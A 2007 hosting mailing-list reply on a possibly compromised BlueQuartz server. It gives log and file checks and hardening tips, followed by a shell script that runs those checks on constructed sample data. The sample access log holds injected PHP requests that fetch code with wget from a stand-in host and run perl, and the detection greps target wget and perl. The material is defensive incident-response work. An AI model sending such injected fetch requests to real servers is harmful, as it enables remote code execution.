Date:  Thu, 12 Apr 2007 08:58:44 -0700
From:  "Ken Marcus - Precision Web Hosting, Inc." <kenmarcus (at mark) precisionweb.net>
Subject:  [coba-e:09541] Re: machine possibly compramised
To:  <coba-e (at mark) bluequartz.org>
Message-Id:  <040801c77d1b$76282580$6700a8c0@OfficeKen>
References:  <bb9e5a970704111706o4ffa7945k2576dc377478750d (at mark) mail.gmail.com>
X-Mail-Count: 09541


----- Original Message ----- 
From: "dnk" <d.k.emaillists (at mark) gmail.com>
To: "BQ List" <coba-e (at mark) bluequartz.org>
Sent: Wednesday, April 11, 2007 5:06 PM
Subject: [coba-e:09532] machine possibly compramised


> Hi there, has anyone seen this before?
>
> We have a BQ (Nuonce) yummed up to today's date.
>
> We started noticing a funny process running. It is running as ./a
> under the apache user. It seems to open up port 60666 and listen on
> it. Our firewall is keeping that port locked up though, otherwise, and
> it seems like this hack can't get past this point. We cleaned it out a
> few days ago, and well, obviously since I am posting it has appeared
> again. We suspect it must be some code being launched through either
> perl or php (and praying it is not through the BQ itself), but was
> hoping for the "hail mary" from the list in case someone has had
> similar experience.
>
>
> Thanks in advance!
>
> dk
>

You might check to see if you have any old version phpbb scripts on your 
server.
locate docs/CHANGELOG.html

You might check the log files:
cat /var/log/httpd/access_log | grep php | grep wget
cat /var/log/httpd/access_log | grep php | grep perl

You could check your user dirs for shell.php type files:
ls -la /home/sites/*.*/users/*/web | grep php
ls -la /home/sites/*.*/users/*/web | grep cgi
ls -la /home/sites/*.*/users/*/web | grep pl


For the future, you might change a few things:
1. proftpd.conf

Within my proftpd.conf <global> section, I always add:
<Limit LOGIN>
    DenyAll
    AllowGroup site-adm
    AllowUser  admin
</Limit>

That stops uploads by non-admin users. Otherwise someone will guess the 
password of, for example, user alex with password alex, and they 
will upload to the user directory and run their scripts from there.


2. you might change the PHP to run in safe mode.

3. chmod 700 /usr/bin/wget

4.  chmod 400  /usr/bin/gcc

5. Set the /tmp partition to not allow execution of scripts (although it is 
pretty easy to get around that)

----
Ken Marcus
Precision Web Hosting, Inc.
http://www.precisionweb.net
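The two detection checks from the reply above (grep the access log for .php requests that mention wget or perl, and list script files under the per-user web directories), as an added example that is not part of the original post or of BlueQuartz. It runs offline against a constructed access_log sample and a constructed /home/sites-style directory tree; the function names, the sample log lines and the temporary paths are assumptions. In production you would pass /var/log/httpd/access_log and /home/sites as the arguments.

```shell
#!/bin/sh
# Added example (not from the original post): the log and web-dir checks
# from the reply, as functions over constructed inputs so it runs offline.

# Constructed sample of /var/log/httpd/access_log (Apache common log
# format). The first two lines are the pattern the reply's grep chain is
# after: a request for a .php script whose query string carries "wget" or
# "perl". The last line is a benign .html hit that a bare "grep perl"
# would wrongly flag.
SAMPLE_LOG='203.0.113.5 - - [11/Apr/2007:16:55:02 -0700] "GET /forum/index.php?p=wget%20http://example.invalid/a HTTP/1.1" 200 4021
203.0.113.5 - - [11/Apr/2007:16:55:09 -0700] "GET /forum/index.php?p=perl%20a HTTP/1.1" 200 3998
198.51.100.7 - - [11/Apr/2007:17:01:44 -0700] "GET /index.php HTTP/1.1" 200 1532
198.51.100.9 - - [11/Apr/2007:17:02:10 -0700] "GET /docs/perl-tutorial.html HTTP/1.1" 200 8812'

# write_sample_log: writes the constructed log to a temp file, prints path.
write_sample_log() {
    log=$(mktemp)
    printf '%s\n' "$SAMPLE_LOG" > "$log"
    echo "$log"
}

# suspicious_php_requests LOGFILE
# Prints log lines whose request field (the text between the first pair of
# double quotes) names a .php script and also mentions wget or perl.
# Matching only that field avoids hits in the referrer or user-agent and
# on pages that merely have "perl" in their file name.
suspicious_php_requests() {
    awk -F'"' '$2 ~ /\.php/ && $2 ~ /(wget|perl)/' "$1"
}

# build_sample_tree: constructs a tree shaped like
# /home/sites/<site>/users/<user>/web under a temp dir and prints its root.
build_sample_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/site1/users/alex/web" "$root/site1/users/bob/web"
    : > "$root/site1/users/alex/web/shell.php"   # the kind of drop to find
    : > "$root/site1/users/alex/web/index.html"
    : > "$root/site1/users/bob/web/sample.html"  # "ls | grep pl" would match this
    : > "$root/site1/users/bob/web/form.cgi"
    echo "$root"
}

# suspicious_web_files SITESROOT
# Lists .php/.cgi/.pl files under every <site>/users/<user>/web directory.
# Exact suffix tests are stricter than "ls -la ... | grep pl", which also
# matches any name containing the letters "pl".
suspicious_web_files() {
    find "$1" -path '*/users/*/web/*' -type f \
        \( -name '*.php' -o -name '*.cgi' -o -name '*.pl' \) | sort
}

# Stand-alone demo over the constructed inputs; cleans up after itself.
run_demo() {
    log=$(write_sample_log)
    root=$(build_sample_tree)
    echo "== .php requests mentioning wget/perl =="
    suspicious_php_requests "$log"
    echo "== script files in user web dirs =="
    suspicious_web_files "$root"
    rm -rf "$log" "$root"
}

run_demo
```

Neither check proves a compromise on its own: a hit in the log shows someone tried to pass a fetch command through a PHP script, and a .php file in a user web directory may be legitimate, so each result still needs a look at the file's owner, timestamp and contents.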